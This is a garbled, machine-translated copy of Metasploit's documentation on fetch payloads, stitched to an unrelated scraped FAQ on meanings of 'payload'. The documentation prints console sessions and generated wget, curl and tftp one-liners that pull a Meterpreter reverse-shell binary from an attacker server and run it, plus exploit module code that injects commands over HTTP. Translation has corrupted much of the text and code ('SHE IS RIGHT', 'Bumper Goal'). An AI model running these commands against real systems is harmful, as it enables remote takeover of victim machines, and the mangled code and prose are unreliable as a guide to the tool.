Bio sind Fetch-Payloads?
Fetch payloads are custom command-based payloads that use network-aware binaries on a remote host to download binary payloads to that remote host. Custom benefits are just benefits where we have added an additional feature to existing behavioral change benefits. In this case, you can still use all your favorite binary user data and transports, but we've also added an optional payload fetch adapter to serve payloads with network binaries and servers. They work similar to some command steps, but are based on the payload side instead of the exploit side for easier integration and portability. Payload retrieval is a quick and easy way to retrieve a session on a target with a command injection or code execution vulnerabilityIknown binary file with the ability to download and save the file.
Terminology
In the following documentation, it's helpful to agree on certain terms of use so we don't get confused or confused.Get cargo
- Run the command on the remote host to get and runload capacity insured
Get the binary number
– The binary we use on the remote host to download the deployed payload. Examples could be WGET, cURL, or Certutil.Get the plate
- The protocol used to download the delivered payload, such as HTTP, HTTPS, or TFTP.Get listeners
– The server hosting the delivered payload.Call manager
- The same asGet listeners
load capacity insured
– The base charge we want to launch. That's what we could call itCustomized carrying capacity
.Handy payload trades
- Handler of delivered cargo. This is just a standard chargemeterpreter/reverse_tcp
ofshell_reverse_tcp
.
Organization
Unlike command stagers, which are organized by binaries, fetch tools are organized by servers. We currently support HTTP, HTTPS, and TFTP servers. After selecting a payload to retrieve, you can select a binary file to run on the remote host to download the specified payload before it runs.
This is the naming convention for the fetch payload:
For example:cmd/linux/https/x64/meterpreter/reverse_tcp
It will do four things: 1) Create onelinux/x64/meterpreter/reverse_tcp
eleven binary as a secure payload. 2) Serve the above payload to the HTTPS server. 3) Start the handler for the delivered load to which the delivered load should be recalled. 4) Generate a command to run on the remote host that downloads and executes the given payload.
A simple standalone example
The fastest way to understand fetch payloads is to use them and examine the output. For example, let's assume a Linux target that can connect to us over an HTTP connection and has a command execution vulnerability. First, let's look at the payload individually:
msf6exploit(meer/ssh/sshexec) >Koristite-payload/cmd/linux/http/x64/meterpreter/reverse_tcpmsf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >Display options Module options (payload/cmd/linux/http/x64/meterpreter/reverse_tcp): Name Current setting Required description ---- --------------- ------ - - -----------FETCH_COMMAND CURL yes Command to get payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)FETCH_FILENAME YXeSdwsoEfOH no Name to use on remote system when saving payload FETCH_SRVHOST 0.0.0.0 yes Local IP To deliver payloadFETCH_SRVPORT 8080 Yes Local port to deliver payloadFETCH_URIPATH No Local URI to deliver payloadFETCH_WRITABLE_DIR Yes External writable directory to store payloadLHOST Yes Listening address (interface can be specified)LPORT 4444 Yes Listening port View complete module information with the command info or info - D.msf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >
options
FETCH_COMMAND
is the binary we want to run on the remote host to download the custom payload. The following options are currently supported:CURL FTP TFTP TNFTP WGET
on Linux hosts andCURL TFTP-CERTUTIL
on Windows hosts. We'll talk more about binaries later.FETCH_FILENAME
is the name under which the executable payload is stored on the remote host. This option is not supported by every binary and must end with.exe
on Windows hosts. Default is random.FETCH_SRVHOST
is the IP on which the server is listening.FETCH_SRVPORT
is the port on which the server is listening.FETCH_URIPATH
is the URI corresponding to the payload file. The default setting is deterministic and based on the underlying payload, so a payload constructed in msfvenom will match a listener started in the framework, provided the underlying payload served is the same.FETCH_WRITABLE_DIR
is the directory on the remote host where we want to save the set payload before running it. Not all binaries support this value. If you set this value and it is not supported, an error will be thrown.
The remaining options are those available to you in the deployed payload. In this case, our chargelinux/x64/meterpreter/reverse_tcp
So our only additional options areLHOST
ILPORT
. If we had chosen a different load, we would have had other options.
Generate the fetch payload
msf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >setze FETCH_COMMAND WGETFETCH_COMMAND => WGETmsf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >set FETCH_SRVHOST 10.5.135.201FETCH_SRVHOST => 10.5.135.201msf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >stel FETCH_SRVPORT 8000FETCH_SRVPORT => 8000 inmsf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >Set LHOST 10.5.135.201LHOST => 10.5.135.201msf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >stel LPORT 4567LPORT => 4567 inmsf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >generate -f rawwget -qO ./YXeSdwsoEfOH http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YXeSdwsoEfOH; ./YXeSdwsoEfOH &msf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >
You can see the generated fetch payload:wget -qO ./YXeSdwsoEfOH http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YXeSdwsoEfOH; ./YXeSdwsoEfOH &
This command takes the provided payload, marks it as executable, and then runs it on the remote host.
Start the retrieval server
When you start thisCall manager
, also starts the server hosting the binary contentIlistener for the delivered payload. OFdetailed
setSHE IS RIGHT
you can see that both the fetch handler and the provided payload handler are running:
msf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >for_handler[*]wget -qO ./YBybOrAmkV http://10.5.135.201:8000/3cP1jDrJ3uWM1WrsRx3HTw; chmod +x ./YBybOrAmkV; ./YBybOrAmkV &[*]The payload handler started as job 0[*]Fetch handler listens on 10.5.135.201:8000[*]http-server gestart[*]Reverse TCP handler started 10.5.135.201:4567
Fetch-Handler in Gediende Payload-Handler
The fetch handler is maintained by the served payload handler, so below is just the served payload handlerthe track
, although the fetch handler listens for:
msf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >jobs -lJobs==== ID Name Payload Options Payload -- ---- ------- ------------ 0 Exploitation: multi/handler cmd/linux/http /x64 /meterpreter/reverse_tcp tcp://10.5.135.201:4567msf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >netstat -ant | Received 8000[*]exec: netstat -ant | grep 8000tcp 0 0 10.5.135.201:8000 0.0.0.0:* LISTEN
Killing the served payload handler also kills the fetch handler:
msf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >The path -k 0[*]Stops the following tasks: 0[*]Job 0 is stoppedmsf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >netstat -ant | Received 8000[*]exec: netstat -ant | grep 8000msf6capacity(cmd/linux/http/x64/meterpreter/reverse_tcp) >
Use Fetch payloads in flight
The nice thing about Fetch Payloads is that it gives you the ability to run a binary payload very quickly without relying on an in-frame session or pushing the payload to the target. If you have a shell session or even a really weird situation where you can run commands, you can quickly set up a session in the framework without having to manually load content. Just follow the steps above and run the given command. We currently only provide usable framework content, but in the future it would be relatively trivial to extend this to providing and running arbitrary executable binaries.
Use in exploitation
Using Fetch Payloads is no different than using any other command. First, give users access to platform-specific fetch payloads by adding a target that supports itARCH_CMD
and also the desired platformWindow
ofLinux
. Once the target is added, you can access the command by calling itnosivost.kodirano
and use it as a run command on a remote target.
Example linked to CmdStager
There is probably some overlap between getting payloads and setting commands. Let's briefly discuss how you can support both in one exploit. See the Command Stager documentation for information on required imports and details for Command Stager. In this case, I'm just documenting the changes that need to be made to make payloads work with Command stagers or use command-style payloads, which I recommend.
In this case, I've modified the code in the command stager documentation to support Linux and Unix command payloads. I just specified the field value forplatform
value and changeTip
to something more general:
"Goals" => [ [ 'linux command', { 'A book' => [ ARCH_CMD ], 'Platform' => [ 'Unix', 'Linux' ], 'Typ' => :nix_cmd } ] ]
Forexecute the command
method does not change:
def execute the command(cmd, _opts = {})fill_values I @sid.Nul? || @Sign.Nul?uri = Data storage['URIPAT'] + '/vendor/htmlawed/htmlawed/htmLawedTest.php' send_request_cgi({ 'method' => 'THAT', 'uri' => normalize_hours(uri), 'Cookie' => 'sid=' + @sid, 'ctype' => 'application/x-www-formulier-urlencoded', 'encode_params' => SHE IS RIGHT, 'vars_post' => { 'Sign' => @Sign, 'Text' => cmd, scream => 'leading', 'she' => @sid } })End
The only change in the exploitation method is to use a more general methodTip
value in the case statement. Otherwise nothing needs to be changed.
def exploit print_status("To carry out#{Goal.To do}for#{Data storage['PAYLOAD']}") Bumper Goal['Typ'] I :nix_cmd execute the command(capacity.encrypted) I :linux_dropper execute_cmdstager End End
If you have an exploit that already supports Unix Command payloads and you want it to support Linux Command payloads, such as Fetch payloads, you can just add itLinux
Value for platform field:
"Nixova naredba", { 'Platform' => [ 'Unix', 'Linux' ], 'A book' => ARCH_CMD, 'Typ' => :unix_cmd, }
Supported commands
I Windows and Linux
CURL
cURL comes pre-installed on Windows 10 and 11 and is incredibly common on Linux platforms. The options are very standardized for different versions and platforms. This makes cURL a good default choice for both Linux and Windows targets. The cURL command supports all options and types of server protocols.
TFTP
Binary TFTP is only useful in edge cases due to a long list of limitations: 1) It is a Windows feature, but is disabled by default in Windows Vista and above. 2) While you will probably find it on Linux and Unix hosts, the options are not standard across all versions. 3) The TFTP binary file included in many Linux systems and all Windows systems does not allow port configuration or target filename configurationFETCH_SRVPORT
must always be set to 69 andFETCH_WRITABLE_DIR
IFETCH_FILENAME
must be empty. Listening on port 69 in the framework can be problematic, so I recommend using the advanced optionFetchListenerBindPort
to run the server on a different port and redirect the connection to the high port using a tool like iptables. For example, if you are on a Linux host with iptables, you can run the following commands to redirect a connection on UDP port 69 to UDP port 3069:sudo iptables -t nat -I PREROUTING -p udp --dport 69 -j REDIRECT --to-ports 3069
sudo iptables -t nat -I OUTPUT -p udp -d 127.0.0.1 --dport 69 -j REDIRECT --to-ports 3069
Then you can adjustFetchListenerBindPort
to 3069 and call back properly. 4) Because TFTP is a UDP-based protocol and because of the server implementation within the framework, a new service is started each time you launch the TFTP polling handler:
msf6capacity(cmd/windows/tftp/x64/meterpreter/reverse_tcp) >jobsJobs==== ID Naam Payload Payload opts -- ---- ------- ------------ 2 Exploit: multi/handler cmd/windows/tftp/x64/meterpreter /obrnuti_tcp tcp://10.5.135.201:4444msf6capacity(cmd/windows/tftp/x64/meterpreter/reverse_tcp) >setze LPORT 4445LPORT => 4445msf6capacity(cmd/windows/tftp/x64/meterpreter/reverse_tcp) >for_handler[*]Run command on remote host: curl -so plEYxIdBQna.exe tftp://10.5.135.201:8080/test1 & start /B plEYxIdBQna.exe[*]Payload Handler started as a 4 job[*]Start the TFTP server at 10.5.135.201:8080[*]Reverse TCP handler started 10.5.135.201:4445msf6capacity(cmd/windows/tftp/x64/meterpreter/reverse_tcp) >jobsJobs==== Id-naam Payload Payload-opties -- ---- ------- ------------ 2 Exploit: multi/handler cmd/windows/tftp/x64/meterpreter /reverse_tcp tcp://10.5.135.201:4444 4 Exploitatie: multi/handler cmd/windows/tftp/x64/meterpreter/reverse_tcp tcp://10.5.135.201:4445msf6capacity(cmd/windows/tftp/x64/meterpreter/reverse_tcp) >netstat -i | Handle 8080[*]exec: netstat -an | grep 8080udp 0 0 10.5.135.201:8080 0.0.0.0:* udp 0 0 10.5.135.201:8080 0.0.0.0:*msf6capacity(cmd/windows/tftp/x64/meterpreter/reverse_tcp) >setze FETCH_URIPATH test4FETCH_URIPATH => test4msf6capacity(cmd/windows/tftp/x64/meterpreter/reverse_tcp) >setze LPORT 8547LPORT => 8547msf6capacity(cmd/windows/tftp/x64/meterpreter/reverse_tcp) >for_handler[*]Run command on remote host: curl -so DOjmRoCOSMn.exe tftp://10.5.135.201:8080/test4 & start /B DOjmRoCOSMn.exe[*]Payload handler started as job 5[*]Start the TFTP server at 10.5.135.201:8080[*]Reverse TCP handler started 10.5.135.201:8547msf6capacity(cmd/windows/tftp/x64/meterpreter/reverse_tcp) >netstat -i | Handle 8080[*]exec: netstat -an | grep 8080udp 0 0 10.5.135.201:8080 0.0.0.0:* udp 0 0 10.5.135.201:8080 0.0.0.0:* udp 0 0 10.5.135.201:8080 0.0.0.0:*
Nothing prevents you from creating a race condition by running multiple TFTP servers with the same IP address, same port, etc.FETCH_URI
Value, but for different payloads. This results in a race condition where the delivered charge is not deterministic.
Windows only
Certutil
Certutil is a good choice for Windows targets - it will likely be present in the latest versions of Windows and is highly configurable. The only problematic aspect is that there is no unsafe mode for certutil. So if you use Certutil with HTTPS protocol, the certificate must be correct and verified. SupportsHTTP
IHTTPS
logs.
Only for Linux
ftp
FTP is an old but useful binary file. Although we support the use of binary FTP, we do not have an FTP server. Modern FTP versions support both HTTP and HTTPS protocols. Unfortunately, we only support these modern versions of inline FTP, so it may not be suitable for older systems.
TNFTP
TNFTP (not to be confused with TFTP) is a newer version of FTP. It is exactly the same as modern FTP, but sometimes old FTP and TNFTP exist on the system, hence the commandtnftp
instead offtp
.
WGET
WGET is probably the first choice for a Linux-only target. It supports HTTPS and HTTP and all payload retrieval options. It's ubiquitous on Linux hosts and is very standard, making it a great choice.
FAQs
What is an example of a payload? ›
A notable example of a payload is an IP packet data payload. This consists of an Ethernet, IP, and TCP header. This information aids the packet in adhering to the communication protocol standard, after which it reaches its destination on the network.
Why do we use payload in metasploit? ›Payload, in simple terms, are simple scripts that the hackers utilize to interact with a hacked system. Using payloads, they can transfer data to a victim system. Singles − Singles are very small and designed to create some kind of communication, then move to the next stage.
What is the use of payload generator? ›The Payload Generator enables you to create a properly formatted executable that you can use to deliver shellcode to a target system without the use of an exploit. The Payload Generator provides a guided interface that walks you through the process of generating a dynamic payload or a classic payload.
What is military payload? ›Aerospace, Military. the bomb load, warhead, cargo, or passengers of an aircraft, a rocket, missile, etc., for delivery at a target or destination. the total complement of equipment carried by a spacecraft for the performance of a particular mission in space.
What is payload in simple words? ›Payload is what a vehicle carries. If you have a plane with a payload of one ton, then that plane can carry one ton (including you and the snacks you may bring aboard). Often, payload is estimated to be everything on board a vehicle that's worth money, or that produces income for the vehicle's owner.
What does a payload do? ›Roughly speaking, payload capacity is the amount of weight a vehicle can carry, and towing capacity is the amount of weight it can pull. Automakers often refer to carrying weight in the bed of a truck as hauling to distinguish it from carrying weight in a trailer or towing.
What are the three types of payloads? ›A payload in Metasploit refers to an exploit module. There are three different types of payload modules in the Metasploit Framework: Singles, Stagers, and Stages.
What are the two types of payloads? ›Types of Payloads
There are two basic types: exploit payloads and auxiliary payloads.
Exploits give you the ability to 'pop a shell/run your payload code'. Example payloads are things like Trojans/RATs, keyloggers, reverse shells etc. Payloads are only referred to when code execution is possible and not when using things like denial of service exploits.
Why is it called payload? ›The term is borrowed from the transportation term that refers to the part of the load that pays for the transportation. Here's an example: a train carries 30 tons of goods; these goods are considered the payload.
Why do we use payload in API? ›
In a REST API, a payload refers to the data or information that is sent by the client in a request to the server or the data that is returned by the server in response to a request.
What does payload mean in coding? ›In computing, a payload is the carrying capacity of a packet or other transmission data unit. The term has its roots in the military and is often associated with the capacity of executable malicious code to do damage.
What is VPN payload? ›The VPN payload configures VPN connections for devices. There are several supported VPN protocols and methods of authentication. Depending on the configuration settings you select, the options in the editor vary.
Why is payload important in UAV? ›Payload refers to air vehicle (aircraft) cargo. It is also defined as the amount of cargo weight an air vehicle can safely carry. Carrying a payload on board is the sole purpose for most UASs. Payloads come in a variety of sizes, weights, and functions.
What is HTTP payload? ›The HTTP message payload body is the information ("payload") part of the data that is sent in the HTTP Message Body (if any), prior to transfer encoding being applied. If transfer encoding is not used, the payload body and message body are the same!
What is the payload of a car? ›Payload is how much weight a vehicle can carry in passengers and cargo. Many view payload only in terms of how much cargo a vehicle can carry, as in, “My pickup can haul 1,600 pounds of firewood.” That is a typical payload for a half-ton pickup, though the number is for passengers and cargo combined.
What is a payload in weapons? ›The payload contains the warhead (or warheads), the guidance system, and such penetration aids as decoys, electronic jammers, and chaff to help elude enemy defenses.
What is drone payload? ›Drone payloads are additional sensors, devices or armaments that can be carried by an unmanned aerial vehicle (UAV).
Where is payload used? ›Simply put, the term payload is utilized by programmers to differentiate between the essential information in a chunk of data and the information that is used to support it. The term originated from the transportation sector, where it refers to the load that a person pays for when they transport something.
What are payload types? ›- API Request payload format.
- API OK response payload format.
- API Failed response payload format.
How is payload determined? ›
Payload Capacity = Gross Vehicle Weight - Curb Weight
For example, if your truck's GVWR is 9,000 lbs and it weighs 5,000 lbs empty, then your payload capacity is 4,000 lbs. You can put 4,000 lbs of people and stuff in your truck. Note: Payload capacity includes passengers!
Computer NetworkComputer EngineeringMCA. In computer networking and telecommunications, when a transmission unit is sent from the source to the destination, it contains both a header and the actual data to be transmitted. This actual data is called the payload.
What is a payload threat? ›In the context of a cyber-attack, a payload is the component of the attack which causes harm to the victim. Much like the Greek soldiers hiding inside the wooden horse in the tale of the Trojan Horse, a malicious payload can sit harmlessly for some time until triggered.
What is a payload security? ›Payload in cyber security is a term used to describe the malicious code or content that is delivered to a target system or device. It is the actual malicious code that is used to exploit a vulnerability or gain access to a system.
How do you send data in payload? ›To send the JSON payload to the server, you need to enclose the JSON data in the HTTP request body and indicate the data type of the request body with the "Content-Type: application/json" request header.
What are the examples of payload in API? ›- Text Messages. ...
- Reaction Messages. ...
- Media Messages. ...
- Unknown Messages. ...
- Location Messages. ...
- Contacts Messages. ...
- Received Callback from a Quick Reply Button. ...
- Received Answer From List Message.
The Table service REST API supports ATOM and JSON as OData payload formats. While the ATOM protocol is supported for all versions of the Azure storage services, the JSON protocol is supported only for version 2013-08-15 and newer. JSON is the recommended payload format.
What are the four broad categories of payloads? ›What are four broad categories of payloads that malware may carry? Corrupted data files or system. Theft of system to create a zombie agent. Malware may carry the system information such as passwords, logins, or other personal data by spyware programs or key logging.
What is payload vs body in API? ›So basically the only difference between HTTP message body and HTTP message payload body is encoding (but only if present). So generalizing the term request payload = request body.
What is an example of a payload exploit? ›A payload is a code that is written to be executed after a system is successfully exploited. They can provide an interactive shell to the attacker, create a backdoor, or execute a particular piece of code. Examples of payloads include the Meterpreter shell, keyloggers, reverse shells, and so on.
Why is payload important? ›
Payload capacity is important because it helps fleet managers and drivers understand the vehicle's limitations. Similar to knowing the GVWR, knowing payload capacity helps prevent vehicle overload. When drivers overload a truck bed or trailer, it can lead to a host of suspension issues.
Is payload a malware? ›In cybersecurity, a payload is malware that the threat actor intends to deliver to the victim. For example, if a cybercriminal sent out an email with a malicious Macro as the attachment and the victim gets infected with ransomware, then the ransomware is the payload (and not the email or document).
What is a payload file? ›A file payload allows you to push files to Android devices for access by other applications on the device. The files delivered as part of this payload are sent to the external SD card folder location by default.
What is an example of a payload in cyber security? ›Examples of active payloads include malware, viruses, and worms. Passive payloads are those that are used to collect information or monitor a system. Examples of passive payloads include keyloggers, spyware, and backdoors.
What can a payload be? ›The term payload has two meanings: data payload, which is related to the transport of data across a network, and malware payload, which refers to malicious code used to exploit and compromise IT networks and systems.
What is an example of payload malware? ›Some common examples of malicious payloads are worms, ransomware, and other malware that arrive on computers by clicking bad links or downloading harmful attachments. Malicious payloads can cause data deletion, encryption, and exfiltration.
What is payload and its types? ›Payloads can be designed to be used independently, or they can be the second stage of an exploit. There are two basic types: exploit payloads and auxiliary payloads.